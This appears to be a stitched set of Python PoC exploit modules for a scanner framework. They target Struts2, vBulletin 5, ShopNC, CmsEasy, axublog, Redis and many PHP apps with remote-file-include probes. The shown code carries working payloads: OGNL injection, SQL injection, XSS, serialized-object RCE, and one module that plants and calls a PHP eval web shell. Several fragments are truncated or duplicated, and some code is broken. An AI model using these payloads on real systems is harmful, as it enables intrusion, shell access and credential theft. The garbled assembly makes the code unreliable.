    appName = 'struts'
    appVersion = 'struts'
    appPowerLink = 'struts'
    samples = ['']

    def _attack(self):
        '''attack mode'''
        # There is no separate exploitation step: attack mode is verify mode.
        verify_mode = self._verify
        return verify_mode()

    def _verify(self):
        '''verify mode'''
        # Sends one POST whose Content-Type header carries an expression in the
        # Struts expression syntax (presumably OGNL) and treats the marker 'bey0nd'
        # echoed in the body as a hit. Returns the Output built by parse_output.
        result = {}
        # NOTE(review): the literal contains '[email protected]', which looks like an
        # artifact of the listing site's e-mail obfuscation, not the author's text —
        # as shown, the string is not what was originally written; confirm against source.
        # NOTE(review): this mutates self.headers in place, so the header stays on the
        # instance for any later request that reuses the same dict.
        self.headers['Content-type'] = "%{(#nikenb='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#[email protected]@getResponse().getWriter()).(#o.println('bey0nd')).(#o.close())}"
        # NOTE(review): no timeout (other PoCs in this listing pass timeout=10); a
        # stalled target blocks the scan and connection errors propagate uncaught.
        resp = req.post(self.url,headers = self.headers)
        if resp and resp.text and resp.status_code == 200:
            if "bey0nd" in resp.text:
                result['FileInfo'] = {}
                # 'FileInfo'/'Filename' is reused here as a generic hit marker.
                result['FileInfo']['Filename'] = "bey0nd"
        return self.parse_output(result)

    def parse_output(self, result):
        """Build the Output for *result*: success when it holds data, else fail('Failed')."""
        out = Output(self)
        if not result:
            out.fail('Failed')
        else:
            out.success(result)
        return out

register(Struts45POC)  # register() comes from outside this file; presumably adds the PoC to the framework registry — confirm
        result = {}
        url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address')
        vul_url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address&inajax=1')

        payload = "exp&true_name[]=1,1,1,1,md5(0x2333333),1,1,1) -- a"
        values = list()
        values.append("form_submit=ok&id=&true_name[]=")
        values.append(payload)
        values.append("&city_id=36&area_id=41&area_info=%E5%8C%97%E4%BA%AC%09%E5%8C%97%E4%BA%AC%E5%B8%82%09%E6%9C%9D%E9%98%B3%E5%8C%BA&address=wrwr&tel_phone=rwrwer&mob_phone=12312344123")
        post_data = "".join(values)

        headers = {"Content-Type": "application/x-www-form-urlencoded"}
        req.post(vul_url, data=post_data, headers=headers)
        res = req.get(url)
        if res.status_code == 200 and '525c6bd8bbf951e6863256456f328265' in res.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vul_url
            result['VerifyInfo']['Payload'] = payload
        return self.parse_attack(result)

    def parse_attack(self, result):
        """Build the Output for *result*: success when it holds data, else a fixed failure message."""
        out = Output(self)
        if not result:
            out.fail('Internet nothing returned')
        else:
            out.success(result)
        return out


register(ShopNCPOC)  # register() comes from outside this file; presumably adds the PoC to the framework registry — confirm
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']

    def _attack(self):
        """Attack mode adds nothing over verify mode; delegate to it."""
        verify_mode = self._verify
        return verify_mode()

    def _verify(self):
        """Verify mode: request the include parameter and report a hit when the marker appears.

        Returns the Output built by parse_attack; on a hit result['VerifyInfo']['URL']
        holds the base URL.
        """
        result = {}
        # The probe points the application's include parameter at a file on an external
        # host (tool.scanv.com); presumably that file produces the marker checked below.
        # If that host is unavailable the check silently reports 'failed', so a negative
        # result is inconclusive.
        vul_url = '%s/eventcal/mod_eventcal.php?lm_absolute_path=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
        # NOTE(review): no timeout (other PoCs in this listing pass timeout=10); request
        # errors propagate as exceptions instead of a 'failed' Output.
        response = req.get(vul_url).content

        # The marker is passed as a regex pattern; it is hex digits only, so this is a
        # plain substring test.
        if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
            result['VerifyInfo'] = {}
            # Records the base URL, not vul_url; other PoCs in this listing record the probe URL.
            result['VerifyInfo']['URL'] = self.url

        return self.parse_attack(result)

    def parse_attack(self, result):
        """Build the Output for *result*: success when it holds data, else fail('failed')."""
        out = Output(self)

        if not result:
            out.fail('failed')
        else:
            out.success(result)

        return out


register(Limbo_CMS_Module_event_Remote_File_Include)  # register() comes from outside this file; presumably framework registration — confirm
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']

    def _attack(self):
        """Attack mode adds nothing over verify mode; delegate to it."""
        verify_mode = self._verify
        return verify_mode()

    def _verify(self):
        """Verify mode: request the include parameter and report a hit when the marker appears.

        Returns the Output built by parse_attack; on a hit result['VerifyInfo']['URL']
        holds the base URL.
        """
        result = {}
        # The probe points the component's path parameter at a file on an external host
        # (tool.scanv.com); presumably that file produces the marker checked below. If
        # that host is unavailable the check silently reports 'failed' (inconclusive).
        vul_url = '%s/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
        # NOTE(review): no timeout (other PoCs in this listing pass timeout=10); request
        # errors propagate uncaught.
        response = req.get(vul_url).content

        # Hex-only marker used as a regex pattern: equivalent to a substring test.
        if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
            result['VerifyInfo'] = {}
            # Records the base URL rather than the probe URL.
            result['VerifyInfo']['URL'] = self.url

        return self.parse_attack(result)

    def parse_attack(self, result):
        """Build the Output for *result*: success when it holds data, else fail('failed')."""
        out = Output(self)

        if not result:
            out.fail('failed')
        else:
            out.success(result)

        return out


register(Joomla_Kochsuite_Component_Remote_File_Include)  # register() comes from outside this file; presumably framework registration — confirm
        phpinfo can be via. that will be leak server's information.
    '''
    # the sample sites for examine
    samples = ['']

    def _attack(self):
        """Attack mode: fetch self.url once (Referer set to the URL, 10 s timeout) and pass
        the raw response object to parse_attack.

        NOTE(review): unlike _verify this hands parse_attack the response itself, not a
        result dict, so the body is never checked for 'PHP Version'; whether the Output is
        success or fail depends only on the response object's truthiness.
        """
        response = req.get(self.url, headers={"referer": self.url}, timeout=10)
        return self.parse_attack(response)

    def _verify(self):
        """Verify mode: GET self.url with a Referer header set to the same URL and report a
        hit when the status is 200 and the body contains 'PHP Version'.

        Returns the Output built by parse_attack; only the URL is recorded, not the page.
        """
        result = {}
        head = {
                'referer':self.url
                }
        respon = req.get(self.url, headers=head, timeout=10)
        # Plain substring test on the body.
        if respon.status_code == 200 and 'PHP Version' in respon.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_attack(result)

    def parse_attack(self, result):
        """Build the Output for *result*: success when it holds data, else a fixed failure message."""
        out = Output(self)
        if not result:
            out.fail('Internet Nothing returned')
        else:
            out.success(result)
        return out


register(PhpinfoPOC)  # register() comes from outside this file; presumably framework registration — confirm
            if match_result:
                result['AdminInfo'] = {}
                result['AdminInfo']['Username'] = match_result[0][1:]
                result['AdminInfo']['Password'] = match_result[1][1:]
        return self.parse_attack(result)

    def _verify(self):
        """Verify mode: send one GET and report a hit when the marker hash appears with status 200.

        Returns the Output built by parse_attack; on a hit result records vul_url and payload.
        """
        result = {}
        vul_url = urlparse.urljoin(self.url, '/akcms_keyword.php?sid=11111')

        payload = "'md5(0x2333333),1,1,1) -- a"

        # NOTE(review): `headers` is built but never passed to the request below.
        headers = {"Content-Type": "application/x-www-form-urlencoded"}
        # NOTE(review): str.join inserts vul_url between every character of payload —
        # this is not concatenation, so the URL actually requested is malformed.
        # No timeout is set either.
        res = req.get(vul_url.join(payload))
        if res.status_code == 200 and '525c6bd8bbf951e6863256456f328265' in res.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vul_url
            result['VerifyInfo']['Payload'] = payload
        return self.parse_attack(result)

    def parse_attack(self, result):
        """Build the Output for *result*: success when it holds data, else a fixed failure message."""
        out = Output(self)
        if not result:
            out.fail('Internet nothing returned')
        else:
            out.success(result)
        return out


register(ShopNCPOC)  # register() comes from outside this file; presumably framework registration — confirm
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']

    def _attack(self):
        """Attack mode adds nothing over verify mode; delegate to it."""
        verify_mode = self._verify
        return verify_mode()

    def _verify(self):
        """Verify mode: request the include parameter and report a hit when the marker appears.

        Returns the Output built by parse_attack; on a hit result['VerifyInfo']['URL']
        holds the base URL.
        """
        result = {}
        # The probe points the installer's `l` parameter at a file on an external host
        # (tool.scanv.com); presumably that file produces the marker checked below. If
        # that host is unavailable the check silently reports 'failed' (inconclusive).
        vul_url = '%s/admin/install.php?l=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
        # NOTE(review): no timeout (other PoCs in this listing pass timeout=10); request
        # errors propagate uncaught.
        response = req.get(vul_url).content

        # Hex-only marker used as a regex pattern: equivalent to a substring test.
        if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
            result['VerifyInfo'] = {}
            # Records the base URL rather than the probe URL.
            result['VerifyInfo']['URL'] = self.url

        return self.parse_attack(result)

    def parse_attack(self, result):
        """Build the Output for *result*: success when it holds data, else fail('failed')."""
        out = Output(self)

        if not result:
            out.fail('failed')
        else:
            out.success(result)

        return out


register(McNews_Remote_File_Include)  # register() comes from outside this file; presumably framework registration — confirm

    def _attack(self):
        """Attack mode adds nothing over verify mode; delegate to it."""
        verify_mode = self._verify
        return verify_mode()


    def _verify(self):
        """Verify mode: request the include parameter and report a hit when the marker appears.

        Returns the Output built by parse_attack; on a hit result['VerifyInfo']['URL']
        holds the base URL.
        """
        result = {}
        # The probe points `path_prefix` at a file on an external host (tool.scanv.com);
        # presumably that file produces the marker checked below. If that host is
        # unavailable the check silently reports 'failed' (inconclusive).
        vul_url = '%s/code/error.php?path_prefix=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
        # NOTE(review): no timeout (other PoCs in this listing pass timeout=10); request
        # errors propagate uncaught.
        response = req.get(vul_url).content

        # Hex-only marker used as a regex pattern: equivalent to a substring test.
        if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
            result['VerifyInfo'] = {}
            # Records the base URL rather than the probe URL.
            result['VerifyInfo']['URL'] = self.url


        return self.parse_attack(result)


    def parse_attack(self, result):
        """Build the Output for *result*: success when it holds data, else fail('failed')."""
        out = Output(self)

        if not result:
            out.fail('failed')
        else:
            out.success(result)

        return out

register(GrayCMS_Remote_File_Include)  # register() comes from outside this file; presumably framework registration — confirm
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']

    def _attack(self):
        """Attack mode adds nothing over verify mode; delegate to it."""
        verify_mode = self._verify
        return verify_mode()

    def _verify(self):
        """Verify mode: request the include parameter and report a hit when the marker appears.

        Returns the Output built by parse_attack; on a hit result['VerifyInfo']['URL']
        holds the base URL.
        """
        result = {}
        # The probe points `ROOT` at a file on an external host (tool.scanv.com);
        # presumably that file produces the marker checked below. If that host is
        # unavailable the check silently reports 'failed' (inconclusive).
        vul_url = '%s/modules/city.get/city.get.php?ROOT=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
        # NOTE(review): no timeout (other PoCs in this listing pass timeout=10); request
        # errors propagate uncaught.
        response = req.get(vul_url).content

        # Hex-only marker used as a regex pattern: equivalent to a substring test.
        if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
            result['VerifyInfo'] = {}
            # Records the base URL rather than the probe URL.
            result['VerifyInfo']['URL'] = self.url

        return self.parse_attack(result)

    def parse_attack(self, result):
        """Build the Output for *result*: success when it holds data, else fail('failed')."""
        out = Output(self)

        if not result:
            out.fail('failed')
        else:
            out.success(result)

        return out


register(Insky_CMS_Remote_File_Include)  # register() comes from outside this file; presumably framework registration — confirm
    def _attack(self):
        """Attack mode: post a marker script through the form endpoint, check whether the
        menu page echoes it back, then issue the clean-up requests.

        Returns the Output built by parse_result. Nothing is attempted unless
        self.common() yields a session id.
        """
        result = {}
        # self.common() is defined outside this block; presumably it logs in and
        # returns a session id — confirm.
        sessionid = self.common()
        if sessionid:
            # MD5 of a random string is used purely as a unique marker for the
            # response check, not for any security purpose.
            token = hashlib.new('md5', randomStr()).hexdigest()
            payload = '<script>alert("%s")</script>' % token
            # NOTE(review): URLs are built by plain concatenation with no URL-encoding of
            # sessionid or payload, and no timeout is set. The first response is discarded.
            req.get(self.url + "/escform.esp?sessionid=" + sessionid + "&formid=131&opmsg=" + payload).content
            response = req.get(self.url + "/escmenu.esp?sessionid=" + sessionid + "&menuid=257").content

            if token in response:
                result['VerifyInfo'] = {}
                result['XSSInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['XSSInfo']['Payload'] = payload
                # Clean-up per the original comments; the assigned `response` values are never read.
                response = req.get(self.url + "/escmenu.esp?sessionid=" + sessionid + "&menuid=259").content    # delete the message
                response = req.get(self.url + "/escmenu.esp?sessionid=" + sessionid + "&menuid=11").content     # log out
        return self.parse_result(result)


    def parse_result(self, result):
        """Build the Output for *result*: success when it holds data, else fail('failed')."""
        out = Output(self)

        if not result:
            out.fail('failed')
        else:
            out.success(result)

        return out

register(ESC_Data_Controller_Privilege_Escalation)  # register() comes from outside this file; presumably framework registration — confirm
            'xajaxargs[0][name]': "1',(SELECT 1 FROM (select count(*),concat("
                                  "floor(rand(0)*2),(select md5(233)))a from "
                                  "information_schema.tables group by a)b),"
                                  "'','','','1','127.0.0.1','2') #"
        }
        # 使用 requests 发送 post 请求
        response = req.post(target, data=post_data, timeout=10)
        content = response.content
        # 这个 e165421110ba03099a1c0393373c5b43 就是 md5(233) 的值
        if 'e165421110ba03099a1c0393373c5b43' in content:
            result = {'VerifyInfo': {}}
            result['VerifyInfo']['URL'] = target

        return self.parse_result(result)

    def _attack(self):
        """Attack mode adds nothing over verify mode; delegate to it."""
        verify_mode = self._verify
        return verify_mode()

    def parse_result(self, result):
        """Build the Output for *result*: success when it holds data, else a fixed failure message."""
        out = Output(self)

        if not result:
            out.fail('Internet Nothing returned')
        else:
            out.success(result)

        return out


register(CmsEasyPoC)  # register() comes from outside this file; presumably framework registration — confirm
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']

    def _attack(self):
        """Attack mode adds nothing over verify mode; delegate to it."""
        verify_mode = self._verify
        return verify_mode()

    def _verify(self):
        """Verify mode: request the include parameter and report a hit when the marker appears.

        Returns the Output built by parse_attack; on a hit result['VerifyInfo']['URL']
        holds the base URL.
        """
        result = {}
        # The probe points `av` at a file on an external host (tool.scanv.com);
        # presumably that file produces the marker checked below. If that host is
        # unavailable the check silently reports 'failed' (inconclusive).
        vul_url = '%s/portfolio/msg/view.php?av=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
        # NOTE(review): no timeout (other PoCs in this listing pass timeout=10); request
        # errors propagate uncaught.
        response = req.get(vul_url).content

        # Hex-only marker used as a regex pattern: equivalent to a substring test.
        if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
            result['VerifyInfo'] = {}
            # Records the base URL rather than the probe URL.
            result['VerifyInfo']['URL'] = self.url

        return self.parse_attack(result)

    def parse_attack(self, result):
        """Build the Output for *result*: success when it holds data, else fail('failed')."""
        out = Output(self)

        if not result:
            out.fail('failed')
        else:
            out.success(result)

        return out


register(Cyberfolio_Remote_File_Include)  # register() comes from outside this file; presumably framework registration — confirm
            "1',(SELECT 1 FROM (select count(*),concat("
            "floor(rand(0)*2),(select md5(233)))a from "
            "information_schema.tables group by a)b),"
            "'','','','1','127.0.0.1','2') #"
        }
        # 使用 requests 发送 post 请求
        response = req.post(target, data=post_data, timeout=10)
        content = response.content
        # 这个 e165421110ba03099a1c0393373c5b43 就是 md5(233) 的值
        if 'e165421110ba03099a1c0393373c5b43' in content:
            result = {'VerifyInfo': {}}
            result['VerifyInfo']['URL'] = target

        return self.parse_result(result)

    def _attack(self):
        """Attack mode adds nothing over verify mode; delegate to it."""
        verify_mode = self._verify
        return verify_mode()

    def parse_result(self, result):
        """Build the Output for *result*: success when it holds data, else a fixed failure message."""
        out = Output(self)

        if not result:
            out.fail('Internet Nothing returned')
        else:
            out.success(result)

        return out


register(CmsEasyPoC)  # register() comes from outside this file; presumably framework registration — confirm
        img_url = self.upload_image()
        payload = '300x300||echo%20PD9waHAgZXZhbCgkX1BPU1RbZV0pOz8%2b|base64%20-d%20%3E%20Uan1wS.php%20%23'

        sess = req.Session()
        sess.headers.update(self.headers)
        sess.get(img_url.replace('300x300', payload))

        #get shell
        resp = req.post('%s/Uan1wS.php' % self.url, data={'e': 'echo strrev(dfgniqsfc);'}).content
        if 'cfsqingfd' in resp:
            result['ShellInfo'] = {}
            result['ShellInfo']['URL'] = '%s/Uan1wS.php' % self.url
            result['ShellInfo']['Content'] = 'e'

        return self.parse_attack(result)

    def _verify(self):
        """Verify mode has no lighter-weight check here; it runs the attack path."""
        attack_mode = self._attack
        return attack_mode()

    def parse_attack(self, result):
        """Build the Output for *result*: success when it holds data, else a fixed failure message."""
        out = Output(self)
        if not result:
            out.fail('Internet nothing returned')
        else:
            out.success(result)
        return out


register(TestPOC)  # register() comes from outside this file; presumably framework registration — confirm
                    award = re.search('</i>[\s\S]+?([\d\.]+kB)[\s\S]+?</td>' , raw[amount_of_raws]).group(1)

                    total = total + 1
                    print '\n'
                    print str(total) + '.'
                    print author
                    print time
                    print type
                    print vid
                    print title
                    print award
                    print '\n'

                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = self.url
        print 'total:' , total
        return self.parse_attack(result)


    def parse_attack(self, result):
        """Build the Output for *result*: success when it holds data, else fail('failed')."""
        out = Output(self)

        if not result:
            out.fail('failed')
        else:
            out.success(result)

        return out

register(showSeebugSubmission)  # register() comes from outside this file; presumably framework registration — confirm
    vulType = 'Database Found'
    desc = 'Angelo-Emlak在web根目录下保存敏感信息,但缺乏足够的访问控制,远程攻击者可以通过直接向veribaze/angelo.mdb发出请求,下载数据库。'
    samples = ['http://burdurdaemlak.com']

    def _attack(self):
        """Attack mode adds nothing over verify mode; delegate to it."""
        verify_mode = self._verify
        return verify_mode()

    def _verify(self):
        """Verify mode: GET the database file path and report a hit when the body starts
        with the Jet/Access file signature 'Standard Jet DB'.

        Returns the Output built by parse_attack; only the base URL is recorded.
        """
        result = {}
        vul_url = '%s/veribaze/angelo.mdb' % self.url
        # NOTE(review): downloads the whole file into memory just to inspect its header,
        # with no timeout; a HEAD or a ranged/streamed read of the first bytes would do.
        response = req.get(vul_url).content

        # Signature used as a regex pattern; it has no metacharacters, so this is a
        # substring test.
        if re.search('Standard Jet DB', response):
            result['VerifyInfo'] = {}
            # The downloaded content is deliberately not stored in result.
            result['VerifyInfo']['URL'] = self.url

        return self.parse_attack(result)

    def parse_attack(self, result):
        """Build the Output for *result*: success when it holds data, else fail('failed')."""
        out = Output(self)

        if not result:
            out.fail('failed')
        else:
            out.success(result)

        return out


register(Angelo_emlak_Database_Found)  # register() comes from outside this file; presumably framework registration — confirm
    def _verify(self):
        '''verify mode'''
        # Opens a raw TCP connection to port 6379, sends the RESP-encoded bytes
        # "*1\r\n$4\r\ninfo\r\n" (the INFO command) and treats a reply containing
        # 'redis_version' as an instance answering without authentication.
        # Returns the Output built by parse_output.
        result = {}
        # Function-local import; the rest of the listing imports at module level.
        import socket
        s = socket.socket()
        payload = '\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
        # NOTE(review): this changes the process-wide default for every socket created
        # afterwards, not just this one; s.settimeout(5) would scope it to this socket.
        socket.setdefaulttimeout(5)
        # url2ip is defined outside this file — presumably resolves self.url to a host.
        host = url2ip(self.url)
        port = 6379
        # NOTE(review): connect/send/recv errors propagate and skip s.close() below
        # (no try/finally or with-block); a single recv may also return a partial reply.
        s.connect((host, port))
        s.send(payload)
        recvdata = s.recv(1024)
        if recvdata and 'redis_version' in recvdata:
            result['FileInfo'] = {}
            # 'FileInfo'/'Filename' is reused here as a generic hit marker.
            result['FileInfo']['Filename'] = "redis-unauth"
        s.close()


        return self.parse_output(result)

    def parse_output(self, result):
        """Build the Output for *result*: success when it holds data, else fail('Failed')."""
        out = Output(self)
        if not result:
            out.fail('Failed')
        else:
            out.success(result)
        return out

register(RedisunauthPOC)  # register() comes from outside this file; presumably framework registration — confirm
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']

    def _attack(self):
        """Attack mode adds nothing over verify mode; delegate to it."""
        verify_mode = self._verify
        return verify_mode()

    def _verify(self):
        """Verify mode: request the include parameter and report a hit when the marker appears.

        Returns the Output built by parse_attack; on a hit result['VerifyInfo']['URL']
        holds the base URL.
        """
        result = {}
        # The probe points `base` at a file on an external host (tool.scanv.com);
        # presumably that file produces the marker checked below. If that host is
        # unavailable the check silently reports 'failed' (inconclusive).
        vul_url = '%s/pop.php?base=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
        # NOTE(review): no timeout (other PoCs in this listing pass timeout=10); request
        # errors propagate uncaught.
        response = req.get(vul_url).content

        # Hex-only marker used as a regex pattern: equivalent to a substring test.
        if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
            result['VerifyInfo'] = {}
            # Records the base URL rather than the probe URL.
            result['VerifyInfo']['URL'] = self.url

        return self.parse_attack(result)

    def parse_attack(self, result):
        """Build the Output for *result*: success when it holds data, else fail('failed')."""
        out = Output(self)

        if not result:
            out.fail('failed')
        else:
            out.success(result)

        return out


register(MyABraCaDaWeb_Remote_File_Include)  # register() comes from outside this file; presumably framework registration — confirm

    def _attack(self):
        """Attack mode adds nothing over verify mode; delegate to it."""
        verify_mode = self._verify
        return verify_mode()


    def _verify(self):
        """Verify mode: request the include parameter and report a hit when the marker appears.

        Returns the Output built by parse_attack; on a hit result['VerifyInfo']['URL']
        holds the base URL.
        """
        result = {}
        # The probe points `view` at a file on an external host (tool.scanv.com);
        # presumably that file produces the marker checked below. If that host is
        # unavailable the check silently reports 'failed' (inconclusive).
        vul_url = '%s/epal/index.php?view=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
        # NOTE(review): no timeout (other PoCs in this listing pass timeout=10); request
        # errors propagate uncaught.
        response = req.get(vul_url).content

        # Hex-only marker used as a regex pattern: equivalent to a substring test.
        if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
            result['VerifyInfo'] = {}
            # Records the base URL rather than the probe URL.
            result['VerifyInfo']['URL'] = self.url


        return self.parse_attack(result)


    def parse_attack(self, result):
        """Build the Output for *result*: success when it holds data, else fail('failed')."""
        out = Output(self)

        if not result:
            out.fail('failed')
        else:
            out.success(result)

        return out

register(AlstraSoft_EPay_Pro_Remote_File_Include)  # register() comes from outside this file; presumably framework registration — confirm
    vulType = 'Remote File Inclusion'
    desc = 'phpBB PlusXL <= 2.0_272 (constants.php) Remote File Include Exploit'
    samples = ['']

    def _attack(self):
        """Attack mode adds nothing over verify mode; delegate to it."""
        verify_mode = self._verify
        return verify_mode()

    def _verify(self):
        """Verify mode: request the include parameter and report a hit when the marker appears.

        Returns the Output built by parse_attack; on a hit result['VerifyInfo']['URL']
        holds the base URL.
        """
        result = {}
        # The probe points `section` at a file on an external host (tool.scanv.com);
        # presumably that file produces the marker checked below. If that host is
        # unavailable the check silently reports 'failed' (inconclusive).
        vul_url = '%s/index.php?section=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
        # NOTE(review): no timeout (other PoCs in this listing pass timeout=10); request
        # errors propagate uncaught.
        response = req.get(vul_url).content

        # Hex-only marker used as a regex pattern: equivalent to a substring test.
        if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
            result['VerifyInfo'] = {}
            # Records the base URL rather than the probe URL.
            result['VerifyInfo']['URL'] = self.url

        return self.parse_attack(result)

    def parse_attack(self, result):
        """Build the Output for *result*: success when it holds data, else fail('failed')."""
        out = Output(self)

        if not result:
            out.fail('failed')
        else:
            out.success(result)

        return out


register(JASmine_News_Remote_File_Include)  # register() comes from outside this file; presumably framework registration — confirm
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']

    def _attack(self):
        """Attack mode adds nothing over verify mode; delegate to it."""
        verify_mode = self._verify
        return verify_mode()

    def _verify(self):
        """Verify mode: request the include parameter and report a hit when the marker appears.

        Returns the Output built by parse_attack; on a hit result['VerifyInfo']['URL']
        holds the base URL.
        """
        result = {}
        # The probe points CONFIG[BASE_PATH] at a file on an external host
        # (tool.scanv.com); presumably that file produces the marker checked below.
        # NOTE(review): the value is wrapped in literal square brackets, which become
        # part of the query value — confirm this is intended rather than a typo.
        vul_url = '%s/admin/autoprompter.php?CONFIG[BASE_PATH]=[http://tool.scanv.com/wsl/php_verify.txt?]' % self.url
        # NOTE(review): no timeout (other PoCs in this listing pass timeout=10); request
        # errors propagate uncaught.
        response = req.get(vul_url).content

        # Hex-only marker used as a regex pattern: equivalent to a substring test.
        if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
            result['VerifyInfo'] = {}
            # Records the base URL rather than the probe URL.
            result['VerifyInfo']['URL'] = self.url

        return self.parse_attack(result)

    def parse_attack(self, result):
        """Build the Output for *result*: success when it holds data, else fail('failed')."""
        out = Output(self)

        if not result:
            out.fail('failed')
        else:
            out.success(result)

        return out


register(interact_Remote_File_Include)  # register() comes from outside this file; presumably framework registration — confirm
    appPowerLink = 'axublog'
    samples = ['']

    def _attack(self):
        '''attack mode'''
        # There is no separate exploitation step: attack mode is verify mode.
        verify_mode = self._verify
        return verify_mode()

    def _verify(self):
        '''verify mode'''
        # Sends one GET to hit.php and reports a hit when the body contains the
        # expected marker hash with status 200. Returns the Output built by parse_output.
        result = {}
        payurl = "hit.php?g=arthit&id=-1 +%55NION+ALL+%53ELECT+1,2,3,4,5,6,md5(1),8,9,10,11,12 from axublog_adusers"
        # NOTE(review): plain concatenation — if self.url has no trailing slash the path
        # is joined incorrectly. No timeout is set.
        resp = req.get(self.url + payurl)
        # NOTE(review): Python 2 print statement dumping the whole response body to
        # stdout; noisy and leaks target content into logs — remove or log at debug.
        print resp.text
        if resp and resp.text and resp.status_code == 200:
            if "c4ca4238a0b923820dcc509a6f75849b" in resp.text:
                result['AdminInfo'] = {}
                # Placeholder value only; nothing is actually extracted here. The literal
                # may also be the listing's masking of the original — confirm against source.
                result['AdminInfo'][
                    'Password'] = "******"
        return self.parse_output(result)

    def parse_output(self, result):
        """Build the Output for *result*: success when it holds data, else fail('Failed')."""
        out = Output(self)
        if not result:
            out.fail('Failed')
        else:
            out.success(result)
        return out


register(AxublogPOC)  # register() comes from outside this file; presumably framework registration — confirm
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']

    def _attack(self):
        """Attack mode adds nothing over verify mode; delegate to it."""
        verify_mode = self._verify
        return verify_mode()

    def _verify(self):
        """Verify mode: request the include parameter and report a hit when the marker appears.

        Returns the Output built by parse_attack; on a hit result['VerifyInfo']['URL']
        holds the base URL.
        """
        result = {}
        # The probe points `file_path` at a file on an external host (tool.scanv.com);
        # presumably that file produces the marker checked below. If that host is
        # unavailable the check silently reports 'failed' (inconclusive).
        vul_url = '%s/index.php?file_path=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
        # NOTE(review): no timeout (other PoCs in this listing pass timeout=10); request
        # errors propagate uncaught.
        response = req.get(vul_url).content

        # Hex-only marker used as a regex pattern: equivalent to a substring test.
        if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
            result['VerifyInfo'] = {}
            # Records the base URL rather than the probe URL.
            result['VerifyInfo']['URL'] = self.url

        return self.parse_attack(result)

    def parse_attack(self, result):
        """Build the Output for *result*: success when it holds data, else fail('failed')."""
        out = Output(self)

        if not result:
            out.fail('failed')
        else:
            out.success(result)

        return out


register(dotWidget_CMS_Remote_File_Include)  # register() comes from outside this file; presumably framework registration — confirm
            resp1 = req.post(shell_url, data=verify_payload)
            if resp1.status_code == 200 and "840c3eda3ea42ecd90aeb3434f3510b7" in resp1.content:
                result['shellURL'] = shell_url + "  password: a"
                return self.parse_attack(result)
        return self.parse_attack(result)

    def _verify(self):
        """Verify mode: GET the decodeArguments endpoint with a URL-encoded serialized
        argument and report a hit when the marker hash appears with status 200.

        Returns the Output built by parse_attack; on a hit result records the full probe
        URL and the raw payload string.
        """
        result = {}
        payload = "O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A18%3A%22vB_Database_MySQLi%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A13%3A%22print+md5%281%29%3B%22%3B%7D"
        vulurl = urlparse.urljoin(
            self.url, '/ajax/api/hook/decodeArguments?arguments=%s' % payload)
        # NOTE(review): Python 2 print statement left in as debug output; route through
        # the framework's logger or remove.
        print vulurl
        # NOTE(review): no timeout; request errors propagate uncaught.
        resp = req.get(vulurl)
        if resp.status_code == 200 and "c4ca4238a0b923820dcc509a6f75849b" in resp.content:
            result["VerifyInfo"] = {}
            result["VerifyInfo"]['URL'] = vulurl
            result["VerifyInfo"]["Payload"] = payload

        return self.parse_attack(result)

    def parse_attack(self, result):
        """Build the Output for *result*: success when it holds data, else a fixed failure message."""
        out = Output(self)
        if not result:
            out.fail("Internet nothing returned")
        else:
            out.success(result)
        return out


register(vB5_RCE)  # register() comes from outside this file; presumably framework registration — confirm
class EduwindPOC(POCBase):
    """PoC module as listed; see the NOTE(review) comments — the metadata and the two
    request paths do not describe the same application, and the file as shown does
    not parse (garbled line in _verify, empty do_login body).
    """
    vulID = '90650'  # ssvid
    version = '1'
    author = ['Dubuqingfeng']
    vulDate = '2016-01-13'
    createDate = '2016-02-03'
    updateDate = '2016-02-03'
    references = ['http://www.sebug.net/vuldb/ssvid-90650']
    # NOTE(review): metadata is inconsistent — name says shopnc, appName says Eduwind,
    # appPowerLink points at phpcms and desc describes phpcms 2008; looks stitched
